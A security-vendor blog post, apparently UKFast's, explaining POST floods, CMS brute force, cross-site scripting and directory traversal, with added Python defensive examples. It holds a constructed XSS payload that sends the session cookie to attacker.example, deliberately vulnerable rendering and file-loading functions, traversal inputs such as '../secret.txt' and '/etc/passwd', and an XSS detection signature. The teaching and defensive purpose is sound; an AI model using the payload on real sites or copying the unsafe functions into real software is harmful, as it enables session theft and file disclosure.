Most Common Cyber-Attacks of 2019 Explained

8 January 2020 by UKFast

Over the course of 2019, UKFast’s Threat Monitoring service detected and responded to more than 33 million cyber-attacks across our clients’ networks. Using this wealth of data, we were able to identify the four most common cyber-attack vectors used by criminals in 2019 to target UK businesses.

Here are your four most notorious cyber-attacks of 2019, how they work and what you can do about them in 2020 to protect your business.

1. Malicious POST requests
2. CMS brute-force attempts
3. Cross-site scripting
4. Directory traversal attempts

1. Malicious POST requests

Number of cyber-attacks detected in 2019:  4.3 million

How does it work?

In general, POST requests send data to your server. Whenever you leave a comment, post a tweet, share content or fill out a contact form on a website, you’re sending your content and the data that comes with it to the server as a POST request. This is normal and just an expected part of how the web works. So, what’s the issue?

By default, a web server places no limit on how many POST requests a client may send or how large their bodies may be. This means that threat actors can flood your server with POST requests at any moment, each one carrying a large body, bombarding your infrastructure and eating into CPU, memory, connections and bandwidth. Your server may absorb a constant stream of malicious POST requests without much distress at first, but the cumulative effect is a seriously strained server struggling to serve legitimate users with diminished resources.

As well as slowing down your server’s responses, or crashing it entirely, threat actors often use these requests to probe for further server vulnerabilities which they can then exploit.

What can you do?

  • Monitor: Monitor POST requests and ensure your logging lets you see the actual content of the request, not just its headers, so you can determine whether it is indeed malicious.
  • Detect: Detecting POST requests starts with a simple search of your access logs for POST entries, noting the source IP, the request method, the URL, the HTTP protocol version, the response code and the request size. Together these make it possible to spot a malicious POST request (for example, many requests per second from one IP to a single URL), though log formats vary with your server configuration.
  • Block: After a period of monitoring, decide which POST requests are valid or accepted on your site (which URLs, what rate, what body size) and implement a ruleset which blocks invalid requests while ensuring valid ones still reach your server.

2. CMS Brute-Force Attempts

Number of cyber-attacks detected in 2019:  725,435

How does it work?

In a brute-force attempt, an attacker tries many combinations of usernames and passwords against your login page. The combinations may be generated systematically, taken from a list of stolen credentials (in which case the attack is often called credential stuffing), or obtained through a phishing campaign targeting employees within your organisation. As the name suggests, the attacker attempts to force their way into your CMS, hammering your login page with username and password combinations until one is accepted.

The sole aim of this cyber-attack is to gain access to an account – in this particular case, access to your CMS – in order to take control of your systems, steal your data or carry out further attacks from inside your network. More than 700,000 brute-force attempts on content management systems (CMS) were detected by UKFast Threat Monitoring in 2019, with WordPress and Joomla identified as the most commonly targeted systems.

What can you do?

Brute-force cyber-attacks are simple in nature and there are some quick wins to be had:

  • Ensure that all default credentials (both usernames AND passwords) have been changed across your whole network. Default credentials are one of the easiest ways for hackers to gain access to your accounts, but changing them is a basic security measure many of us forget – this includes your Wi-Fi password!
  • Invest in an Intrusion Detection or Intrusion Prevention service (like threat monitoring). Threat monitoring spots suspicious activity such as one source trying many different username and password combinations in a short period. An intrusion prevention system then blocks the offending IP address once a threshold of failed logins is crossed, dramatically reducing the chances of a successful brute-force attack.
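The detection logic behind sections 1 and 2 is the same: count POST requests per source IP over a sliding window and raise an alert when a threshold is crossed, with a much lower threshold for POSTs to a CMS login page. The following Python is an added example written for this page, not UKFast’s threat-monitoring code. It parses Apache/nginx "combined" access-log lines, flags floods and brute-force attempts, and renders the flagged IPs as nginx deny directives for the blocking step. The log lines, the IP addresses, the thresholds and the set of login paths are constructed assumptions; tune the thresholds from your own monitoring period.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log line (the sample lines below are constructed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Login endpoints of the two CMSs named in the post (assumption: default install paths).
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php", "/administrator/index.php"}


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, proto, status, size; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


class PostRateDetector:
    """Sliding-window counters of POST requests per source IP.

    flood_limit: POSTs to any URL within `window` before an IP is flagged as a flood.
    login_limit: POSTs to a login endpoint within `window` before an IP is flagged as brute force.
    Both thresholds are assumptions for this demo.
    """

    def __init__(self, window=timedelta(seconds=60), flood_limit=100, login_limit=10):
        self.window = window
        self.flood_limit = flood_limit
        self.login_limit = login_limit
        self.posts = defaultdict(deque)    # ip -> timestamps of all POSTs in the window
        self.logins = defaultdict(deque)   # ip -> timestamps of POSTs to LOGIN_PATHS

    def _push(self, dq, ts):
        dq.append(ts)
        while ts - dq[0] > self.window:    # drop timestamps that fell out of the window
            dq.popleft()
        return len(dq)

    def feed(self, rec):
        """Feed one parsed record; return ('brute-force'|'flood', ip) when a threshold is crossed, else None."""
        if rec["method"] != "POST":
            return None
        ip, ts = rec["ip"], rec["ts"]
        n_all = self._push(self.posts[ip], ts)
        n_login = self._push(self.logins[ip], ts) if rec["path"] in LOGIN_PATHS else 0
        if n_login >= self.login_limit:
            return ("brute-force", ip)
        if n_all >= self.flood_limit:
            return ("flood", ip)
        return None


def analyse(lines, **thresholds):
    """Run the detector over raw log lines; return {ip: first alert type}."""
    det = PostRateDetector(**thresholds)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = det.feed(rec)
        if hit and hit[1] not in alerts:
            alerts[hit[1]] = hit[0]
    return alerts


def deny_rules(alerts):
    """Render flagged IPs as nginx deny directives for the blocking step."""
    return [f"deny {ip};" for ip in sorted(alerts)]


def _constructed_sample_log():
    """Constructed traffic: a WordPress brute-forcer, a contact-form flooder and a normal commenter."""
    t0 = datetime(2019, 11, 4, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status):
        ts = (t0 + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 1234'

    lines = [line("203.0.113.7", i * 2, "POST", "/wp-login.php", 200) for i in range(12)]
    lines += [line("198.51.100.23", i // 5, "POST", "/contact", 200) for i in range(150)]
    lines += [line("192.0.2.10", i * 20, "POST", "/wp-comments-post.php", 302) for i in range(3)]
    lines += [line("192.0.2.10", 5, "GET", "/", 200), "garbage line that does not parse"]
    return lines


SAMPLE_LOG = _constructed_sample_log()
```

Running `analyse(SAMPLE_LOG)` flags 203.0.113.7 as brute force after its tenth login POST and 198.51.100.23 as a flood after its hundredth POST, while the commenter at 192.0.2.10 is never flagged. The two counters are kept separate on purpose: twelve POSTs a minute is unremarkable for a contact form but is a clear signal against a login page.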

3. Cross-Site Scripting Attempts

Number of cyber-attacks detected in 2019:  699,817

How does it work?

Cross-site scripting (XSS) is both a class of web vulnerability and the name of the client-side attack that exploits it. Hackers inject malicious script into a legitimate web page so that it runs in the browsers of that page’s visitors, which allows them to compromise the interactions users have with the vulnerable application. The browser trusts the injected code because it executes within the origin of the legitimate site, indistinguishable from the site’s own scripts.

XSS allows the attacker to act as the victim on the trusted site, send malicious data on their behalf, steal cookies containing session tokens and other sensitive information, and monitor the activity of unsuspecting application users. This can lead to data breaches or even complete control over the application if the stolen session or credentials carry admin privileges.

What can you do?

Cross-site scripting (XSS) was one of the most frequently detected attack methods of 2019. With a large proportion of our workloads and revenue now dependent on web-based applications, defending against web-based attacks is paramount. XSS attacks can be mitigated by using a variety of measures in tandem:

  • Use a web application firewall (WAF) to monitor, detect and prevent web-based attacks by filtering your app’s traffic. WAF rulesets can also be custom-built to block request patterns characteristic of XSS attempts.
  • Employ reputable developers, encode all user-supplied data on output according to the HTML context it lands in, and perform regular review of application code.
  • Perform regular vulnerability scans (threat monitoring can help detect issues within your web applications).
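To make the code-review point concrete, here is an added Python example written for this page (not code from UKFast or from any product it describes). It places a constructed cookie-stealing payload into a page the vulnerable way and the hardened way, shows why an attribute that holds a URL needs a scheme allow-list rather than just encoding, gives a Content-Security-Policy header that stops inline script as a backstop, and includes the kind of crude signature a WAF rule matches on. The payload, the link markup, the CSP value and the signature are assumptions made for the demo.

```python
import html
import re
from urllib.parse import unquote

# Constructed attacker input: a reflected-XSS probe that exfiltrates the session cookie.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_search_unsafe(query):
    """Vulnerable: user input is concatenated straight into the HTML response body."""
    return f"<h1>Results for {query}</h1>"


def render_search_safe(query):
    """Hardened: HTML-encode the value for the element-content context where it is placed."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def render_link_unsafe(url):
    """Vulnerable attribute context: encoding alone is not enough for href, because
    javascript: is a valid URL scheme and needs no angle brackets or quotes at all."""
    return f'<a href="{html.escape(url, quote=True)}">profile</a>'


def render_link_safe(url):
    """Allow-list the scheme before placing user data into a URL attribute, then encode it."""
    if not re.match(r"^https?://", url, re.I):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">profile</a>'


# Response header that blocks inline script even if an injection slips past encoding
# (assumption: the site serves all of its own JavaScript from its own origin).
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'; object-src 'none'")

# Crude WAF-style signature for the request-filtering step. It catches the obvious probes but
# is easy to evade (other event handlers, encoding tricks), which is why it is a second layer
# behind output encoding rather than a replacement for it.
XSS_SIGNATURE = re.compile(r"<\s*script\b|javascript\s*:|\bon(?:error|load|click)\s*=", re.I)


def looks_like_xss_probe(raw_param):
    """True if a URL-decoded request parameter matches the signature."""
    return bool(XSS_SIGNATURE.search(unquote(raw_param)))


LIVE_SCRIPT = re.compile(r"<script\b", re.I)


def contains_live_script(markup):
    """True if the rendered output still contains a real <script> tag the browser would execute."""
    return bool(LIVE_SCRIPT.search(markup))
```

The unsafe renderer returns the payload intact, so a browser would run it in the site’s origin; the safe renderer returns it as `&lt;script&gt;…`, which is displayed as text. Note that `render_link_unsafe` is still exploitable with `javascript:alert(1)` even though it calls `html.escape`, which is the reason encoding must be chosen per context and URLs get an allow-list.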

4. Directory Traversal Attempts

Number of cyber-attacks detected in 2019:  586,042

How does it work?

Directory traversal, also known as file path traversal, is a web security vulnerability which allows an attacker to access restricted directories and read files on an application’s server.

For example, take a page on your website which displays an image. The image has an associated URL, and to load it the application appends the requested filename to a base directory and then uses a filesystem API to read the contents of the file. In some cases this filename parameter is unprotected, so attackers can supply their own value and request an arbitrary file from your server’s filesystem. This is done using ../ sequences and encoded variants of them, designed to step up out of the intended directory, ultimately reaching the root of the filesystem. From there the attacker can read any file the web server process is permitted to read, and where the application also writes files under user control, modify application data or behaviour and ultimately take full control of your server.

Files affected include application code and data, credentials for back-end systems, and sensitive OS files. Directory traversal is usually carried out with the intent of gaining control over your server, stealing your business-critical data and causing a data breach.

What can you do?

The most effective way to prevent directory traversal vulnerabilities is to avoid passing user-supplied input to filesystem APIs altogether, which usually means rewriting the affected function so that it selects a file by an internal identifier rather than by a user-supplied name.

If passing user-supplied input to filesystem APIs is unavoidable, then the following layers of defence should be used together to prevent attacks:

  • Employ effective file permissions: audit file permissions so that the web server process can only read the locations it genuinely needs.
  • Your application should validate the user input before processing it, comparing it against an allow list of permitted values. If that isn’t possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters (a WAF can help with this).
  • After validating the supplied input, the application should append the input to the base directory and canonicalise the resulting path (resolving ../ sequences and symbolic links). It should then verify that the canonicalised path still starts with the expected base directory.
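The three layers above, carried through in working code. This is an added Python example written for this page, not UKFast code. It builds a constructed directory tree in a temporary location, shows the vulnerable loader reading a secret through `../` and through a symlink, and then shows a hardened loader that decodes, validates against a strict filename pattern, canonicalises with `os.path.realpath` and checks containment. The directory layout, file names, secret contents and the filename pattern are all assumptions made for the demo.

```python
import os
import re
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested filename would resolve outside the base directory."""


def load_image_unsafe(base_dir, filename):
    """Vulnerable: appends user input to the base directory and reads whatever results.
    Note that os.path.join discards base_dir entirely if filename is absolute."""
    with open(os.path.join(base_dir, filename), "rb") as f:
        return f.read()


# Layer 1: strict allow-list pattern for the filenames this endpoint legitimately serves
# (assumption: images are named with letters, digits, '_' or '-' and one of three extensions).
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.(?:png|jpg|gif)$")


def resolve_safe(base_dir, filename):
    """Decode, validate, then canonicalise and confirm the path is still under base_dir."""
    name = unquote(filename)  # decode %2e%2e%2f and friends before validating
    if not SAFE_NAME.match(name):
        raise TraversalError(f"rejected filename: {filename!r}")
    base = os.path.realpath(base_dir)
    # Layer 2: realpath resolves '..' and symlinks, so the containment check sees the real target.
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise TraversalError(f"path escapes base directory: {filename!r}")
    return target


def load_image_safe(base_dir, filename):
    """Hardened loader: only reads a file that passed resolve_safe."""
    with open(resolve_safe(base_dir, filename), "rb") as f:
        return f.read()


def is_rejected(base_dir, filename):
    """True if the hardened loader refuses the filename."""
    try:
        load_image_safe(base_dir, filename)
    except TraversalError:
        return True
    return False


def make_demo_tree():
    """Constructed layout: <root>/images/logo.png is public, <root>/secret.txt must stay private,
    and <root>/images/leak.png is a symlink to the secret (the case a filename regex alone misses)."""
    root = tempfile.mkdtemp()
    images = os.path.join(root, "images")
    os.mkdir(images)
    with open(os.path.join(images, "logo.png"), "wb") as f:
        f.write(b"PNG-DATA")
    with open(os.path.join(root, "secret.txt"), "wb") as f:
        f.write(b"db_password=hunter2")
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(images, "leak.png"))
    return root, images


# Built once on import so the demo can be exercised directly (assumption: a writable temp dir exists).
DEMO_ROOT, DEMO_IMAGES = make_demo_tree()
```

Against this tree, `load_image_unsafe(DEMO_IMAGES, "../secret.txt")` and `load_image_unsafe(DEMO_IMAGES, "leak.png")` both return the database password, while the hardened loader rejects `../secret.txt`, its URL-encoded form `..%2Fsecret.txt`, the absolute path `/etc/passwd` and the symlinked `leak.png`, and still serves `logo.png`. The symlink case is the reason the canonicalisation layer exists: `leak.png` satisfies the allow-list pattern and only the realpath check catches it. File permissions (layer 3 in the list above) are an operating-system control rather than application code, so they are not shown here.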

Putting the right security in place

To avoid potential downtime, slow site speeds and data breaches, defending against these four common cyber-threats is essential. But we understand that for many businesses, the process of monitoring, detecting and responding can be time-consuming and inconvenient.

That’s why, as well as monitoring, detecting and blocking cyber-threats in action, UKFast Threat Monitoring:

  • Determines the correct rulesets and file permissions to defend against a variety of threats like malicious POST requests and directory traversal
  • Assists with the management of WAF rulesets
  • Automatically blocks brute force attempts at the source
  • Provides the option to include Threat Response – employing a team of security experts to respond to threats on your network directly

Join the hundreds of businesses already taking advantage of UKFast’s Threat Vision service and ensure you’re protected against the biggest cyber-threats in 2020.

Have 2020 vision when it comes to network security. Find out more about UKFast Threat Vision from our security experts.